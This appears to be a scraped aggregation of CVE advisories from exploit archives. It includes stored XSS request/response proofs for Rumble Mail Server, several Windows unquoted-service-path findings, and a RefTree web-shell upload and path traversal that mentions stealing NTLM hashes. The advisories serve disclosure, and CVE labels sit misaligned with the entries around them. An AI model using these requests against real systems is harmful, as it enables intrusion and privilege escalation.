A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the username parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /users HTTP/1.1
    Host: 127.0.0.1:2580
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 96
    Origin: http://127.0.0.1:2580
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    Referer: http://127.0.0.1:2580/users
    Upgrade-Insecure-Requests: 1
    
    username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on a.com<br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
    
    
    <h1>RumbleLua users </h1>
    <p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
    Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
    while regular users can only
    see and edit the domains they have access to.
    </p>
    <table class="elements">
      <tr>
        <th>Create a new user:</th>
      </tr>
    <tr>
    <td>
    <form action="/users" method="post" name="makeuser">
    
      <div style="width: 300px; text-align:right; float: left;">
        <label for="username"><strong>Username:</strong></label>
        <input name="username" autocomplete="off" type="text" id="username" >
        <br>
        <label for="password"><strong>Password:</strong></label>
        <input type="password" autocomplete="off" name="password" id="password">
        <br />
        <label for="password"><strong>Access rights:</strong></label>
        <select name="rights" size="4" style="width: 150px;" multiple="multiple">
        <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
        <optgroup label="Domains:">
            </optgroup>
        </select>
          </div>
        <p><br /><br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    
          &nbsp;&nbsp;
          <input type="submit" name="submit" id="submit" value="Submit" />
        </p>
    
    </form>
    </td>
    </tr>
    </table>
    <table width="200" class="elements">
      <tr>
        <th>Username</th>
        <th>Rights</th>
        <th>Actions</th>
      </tr>
      <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
      </table>
    <p>&nbsp;</p>
    
    
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43462: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exists in System Explorer 7.0.0 via via a specially crafted file in the SystemExplorerHelpService service executable path.

    # Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
    # Date: 2020-10-14
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://systemexplorer.net/
    # Software Link:  http://systemexplorer.net/download/SystemExplorerSetup.exe
    # Version: Version 7.0.0
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Service info:
    
    C:\Users\m507>sc qc SystemExplorerHelpService
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: SystemExplorerHelpService
            TYPE               : 20  WIN32_SHARE_PROCESS
            START_TYPE         : 3   DEMAND_START
            ERROR_CONTROL      : 0   IGNORE
            BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : System Explorer Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43460: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exists in Ext2Fsd v0.68 via a specially crafted file in the Ext2Srv Service executable service path.

    # Exploit Title: Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
    # Date: 2021-1-19
    # Exploit Author: Mohammed Alshehri
    # Software Link:  https://sourceforge.net/projects/ext2fsd/files/latest/download
    # Version: 0.68
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc Ext2Srv
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: Ext2Srv
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Ext2Fsd\Ext2Srv.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Ext2 Management Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43463: Offensive Security’s Exploit Database Archive

Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the servername parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /settings:save HTTP/1.1
    Host: 127.0.0.1:2580
    Connection: keep-alive
    Content-Length: 343
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46YWRtaW4=
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1:2580
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1:2580/settings
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    
    save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
    HTTP/1.1 302 Moved
    Location: /settings:save
    
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on <script>alert(xss.com)</script><br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
      <h1>Server settings</h1>
    
    Saving config/rumble.conf
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43461: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exists in FreeLAN 2.2 via a specially crafted file in the FreeLAN Service path.

    # Exploit Title: FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path
    # Date: 2021-1-20
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: www.freelan.org
    # Software Link: https://github.com/freelan-developers/freelan/releases/download/2.2/freelan-2.2.0-x86-install.exe
    # Version: Version 2.2
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc "FreeLAN Service"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: FreeLAN Service
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\FreeLAN\bin\freelan.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : FreeLAN Service
            DEPENDENCIES       : tap0901
                               : Dhcp
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43455: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exists in bVPN 2.5.1 via a specially crafted file in the waselvpnserv service path.

    # Exploit Title: bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path
    # Date: 2021-1-19
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: https://carolcoral.github.io/no-free_vpn/
    # Software Link: https://github.com/carolcoral/no-free_vpn/releases/download/BVPN%4020190225/bVPN_2_5_1_setup.exe
    # Version: Version 2.5.1
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc "waselvpnserv"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: waselvpnserv
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : waselvpnserv
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43457: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exits in Vembu BDR 4.2.0.1 via a specially crafted file in the (1) hsflowd, (2) VembuBDR360Agent, or (3) VembuOffice365Agent service paths.

    # Exploit Title: Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths
    # Date: 2020-11-6
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: https://www.vembu.com/
    # Software Link: https://sg-build-release.s3.amazonaws.com/BDRSuite/V420/4202020051312/Vembu_BDR_Backup_Server_Setup_4_2_0_1_U1_GA.exe
    # Version: Version 4.2.0.1 U1
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc "hsflowd"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: hsflowd
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\hsflowd.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Host_sFlow_Agent
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>sc qc "VembuBDR360Agent"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: VembuBDR360Agent
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\VembuBDR360Agent.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : VembuBDR360Agent
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>sc qc "VembuOffice365Agent"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: VembuOffice365Agent
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Vembu\VembuBDR\..\VembuOffice365Agent\bin\VembuOffice365Agent.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : VembuOffice365Agent
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43458: Offensive Security’s Exploit Database Archive

An unrestricted file upload vulnerability in IdeaRE RefTree before 2021.09.17 allows remote authenticated users to execute arbitrary code by using UploadDwg to upload a crafted aspx file to the web root, and then visiting the URL for this aspx resource.

    ===============================================================================                  title: IdeaRE RefTree Remote Code Execution                product: IdeaRE RefTree < 2021.09.17     vulnerability type: Unrestricted File Upload                 CVE ID: CVE-2022-27249               severity: High           CVSSv3 score: 8.8          CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H                  found: 2021-09-13                     by: Savino Sisco saviosisco@gmail.com===============================================================================[EXECUTIVE SUMMARY]RefTree is a web application made for managing complex real estate situations.Among other features, it offers the possibility for authenticated usersto upload and download DWG (CAD drawings) files for buildings.During a penetration test activity, an "Unrestricted File Upload" vulnerabilitywas found which leverages the upload feature to upload a file anywhere on the target system.By uploading a malicious web page, like an aspx web shell, to the server'sweb root it is possible to achive code execution by just navigating to themalicious page with a web browser.[VULNERABLE VERSIONS]IdeaRE RefTree < 2021.09.17[TECHNICAL DETAILS]It is possible to reproduce the issue following these steps:1. Log into the application to get a valid session cookie2. Get a valid "ObjId" from the application (the ID of a building to associate   the file to)3. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/UploadDwg'   to upload a file on the target system, for example a web shell in the   server's web root4. Navigate to the new page with a web browser to trigger code executionExample of the HTTP request to the Upload endpoint:POST /CaddemServiceJS/CaddemService.svc/rest/UploadDwg HTTP/2Host: [REDACTED]Cookie: ASP.NET_SessionId=b1125gke23enpul1ukeu1ouyUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 2211Origin: https://[REDACTED]Referer: https://[REDACTED]/Reftreespace/{  "FileContent": "[BASE64_PAYLOAD]",  "DwgName": "C:\\inetpub\\wwwroot\\webshell.aspx",  "UploadType": "WorkingCopy",  "ObjId": 4774726,  "ObjType": 5,  "UpdateState": true,  "DwgOp": 23}HTTP/2 200 OKCache-Control: privateContent-Type: application/json; charset=utf-8Server: Microsoft-IIS/10.0Access-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: [REDACTED]X-Powered-By: ASP.NETDate: Fri, 10 Sep 2021 15:00:53 GMTContent-Length: 24{"UploadDwgResult":null}[VULNERABILITY REFERENCE]The following CVE ID was allocated to track the vulnerabilities:CVE-2022-27249[DISCLOSURE TIMELINE]2021-09-13  Vulnerability disclosed to our customer and the vendor.            Vendor acknowledged the issue.2021-09-17  Vendor released a fix for the software.2021-10-15  The vulnerability was rechecked in the newer version to confirm             that is was indeed fixed.2022-03-15  Researcher requested to publicly disclose the issue; public            coordinated disclosure.[RESOLUTION]Update the software to a version >= 2021.09.17Savino Sisco <saviosisco@gmail.com>https://www.linkedin.com/in/savino-sisco/

CVE-2022-27249: IdeaRE RefTree Shell Upload ≈ Packet Storm

A directory traversal vulnerability in IdeaRE RefTree before 2021.09.17 allows remote authenticated users to download arbitrary .dwg files from a remote server by specifying an absolute or relative path when invoking the affected DownloadDwg endpoint. An attack uses the path field to CaddemServiceJS/CaddemService.svc/rest/DownloadDwg.

`===============================================================================   title: IdeaRE RefTree Download Path Traversal   product: IdeaRE RefTree < 2021.09.17   vulnerability type: Directory Traversal   CVE ID: CVE-2022-27248   severity: Medium   CVSSv3 score: 4.3   CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N   found: 2021-09-13   by: Savino Sisco <saviosisco@gmail.com>   ===============================================================================  [EXECUTIVE SUMMARY]   RefTree is a web application made for managing complex real estate situations.   Among other features, it offers the possibility for authenticated users   to upload and download DWG (CAD drawings) files for buildings.  During a penetration test activity, a "Directory Traversal" vulnerability   was found on the download feature which allows to download arbitrary files   with the "dwg" extension. The application actually checks that the filename   ends with "dwg", so it's not possible to download files with other extensions.  This vulnerability may also allow to steal NTLM hashes of the host system   by supplying, as the download path, a UNC path pointing to an   attacker controlled machine running a tool like Responder.  [VULNERABLE VERSIONS]   IdeaRE RefTree < 2021.09.17  [TECHNICAL DETAILS]   It is possible to reproduce the issue following these steps:   1. Log into the application to get a valid session cookie   2. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/DownloadDwg'   to download an arbitrary "dwg" file (UNC paths are accepted).  Example of the request to the Download endpoint:  POST /CaddemServiceJS/CaddemService.svc/rest/DownloadDwg HTTP/2   Host: [REDACTED]   User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0   Accept: application/json, text/plain, */*   Accept-Language: en-US,en;q=0.5   Accept-Encoding: gzip, deflate   Content-Type: application/json   Content-Length: 111   Origin: https://[REDACTED]   Referer: https://[REDACTED]/Reftreespace/   Cookie: ASP.NET_SessionId=dezu5r0zswyqk4dukwt5jt5n  {   "path": "C:\\Users\\Public\\test.dwg"   }  HTTP/2 200 OK   Cache-Control: private   Content-Type: application/json; charset=utf-8   Server: Microsoft-IIS/10.0   Access-Control-Allow-Credentials: true   Access-Control-Allow-Origin: https://[REDACTED]   X-Powered-By: ASP.NET   Date: Thu, 10 Oct 2021 11:21:32 GMT   Content-Length: 241916  {"DownloadDwgResult":[BASE64_FILE_REDACTED]}  [VULNERABILITY REFERENCE]   The following CVE ID was allocated to track the vulnerabilities:   CVE-2022-27248  [DISCLOSURE TIMELINE]   2021-09-13 Vulnerability disclosed to our customer and the vendor.   Vendor acknowledged the issue.   2021-09-17 Vendor released a fix for the software.   2021-10-15 The vulnerability was rechecked in the newer version to confirm   that is was indeed fixed.   2022-03-15 Researcher requested to publicly disclose the issue; public   coordinated disclosure.  [RESOLUTION]   Update the software to a version >= 2021.09.17  [CONTACT DETAILS]   Savino Sisco <saviosisco@gmail.com>   https://www.linkedin.com/in/savino-sisco/  `

CVE-2022-27248: IdeaRE RefTree Path Traversal ≈ Packet Storm

Improper Input Validation vulnerability in ABB 800xA, Control Software for AC 800M, Control Builder Safe, Compact Product Suite - Control and I/O, ABB Base Software for SoftControl allows an attacker to cause the denial of service.

Tag

#microsoft